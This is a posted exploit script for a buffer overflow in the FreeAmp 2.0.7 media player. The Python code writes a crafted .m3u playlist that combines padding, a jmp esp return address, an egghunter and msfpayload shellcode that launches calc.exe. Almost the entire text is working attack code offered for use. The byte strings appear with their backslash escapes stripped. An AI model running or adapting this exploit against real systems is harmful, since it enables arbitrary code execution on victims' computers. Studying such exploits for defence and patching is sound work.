FreeAmp 2.0.7 Buffer Overflow
Posted on 14 December 2010
# Exploit Title: FreeAmp 2.0.7 .m3u Buffer Overflow - Egghunter # Google Dork: N/A # Date: 11/12/2010 # Author: zota (Thanks to Andrew; andras.kabai@cert-hungary.hu) # Software Link: http://letoltes.szoftverbazis.hu/bfc5ec1d5e80cee5b5d3f78459113ed93c51f649/4d03800a/freeamp-v2-0-7-JI2/freeampsetup_2_0_7.exe # Version: 2.0.7 # Tested on: Windows XP SP3 HUN # CVE : N/A filename = "crash.m3u" egg = "H4CK" #egghunter --> size 32 byte egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x48x34x43x4bx8bxfaxafx75xeaxafx75xe7xffxe7" padding = "A" * 14654 #kernel32.dll #7c86467b --> jmp esp eip = "x7bx46x86x7c" # 16 byte nop after eip nop= "C" * 16 #msfpayload windows/exec CMD=calc.exe r | msfencode -b "x00x0ax0d --> size 228 byte" payload = ( "xdbxcfxd9x74x24xf4xbaxf0x1bxe7xdbx5bx31xc9" + "xb1x33x31x53x18x03x53x18x83xc3xf4xf9x12x27" + "x1cx74xdcxd8xdcxe7x54x3dxedx35x02x35x5fx8a" + "x40x1bx53x61x04x88xe0x07x81xbfx41xadxf7x8e" + "x52x03x38x5cx90x05xc4x9fxc4xe5xf5x6fx19xe7" + "x32x8dxd1xb5xebxd9x43x2ax9fx9cx5fx4bx4fxab" + "xdfx33xeax6cxabx89xf5xbcx03x85xbex24x28xc1" + "x1ex54xfdx11x62x1fx8axe2x10x9ex5ax3bxd8x90" + "xa2x90xe7x1cx2fxe8x20x9axcfx9fx5axd8x72x98" + "x98xa2xa8x2dx3dx04x3bx95xe5xb4xe8x40x6dxba" + "x45x06x29xdfx58xcbx41xdbxd1xeax85x6dxa1xc8" + "x01x35x72x70x13x93xd5x8dx43x7bx8ax2bx0fx6e" + "xdfx4ax52xe5x1exdexe8x40x20xe0xf2xe2x48xd1" + "x79x6dx0fxeexabxc9xffxa4xf6x78x97x60x63x39" + "xfax92x59x7ex02x11x68xffxf1x09x19xfaxbex8d" + "xf1x76xafx7bxf6x25xd0xa9x95xa8x42x31x74x4e" + "xe2xd0x88x9a") buffer = padding + egg + egg + payload + "A" * (14907 - len(padding) - len(egg) - len(egg) -len(payload)) + eip + nop + egghunter + "D" * (15000 - 14907 - len(egg) - len(nop) - len(egghunter)) textfile = open(filename,'w') textfile.write(buffer) textfile.close()
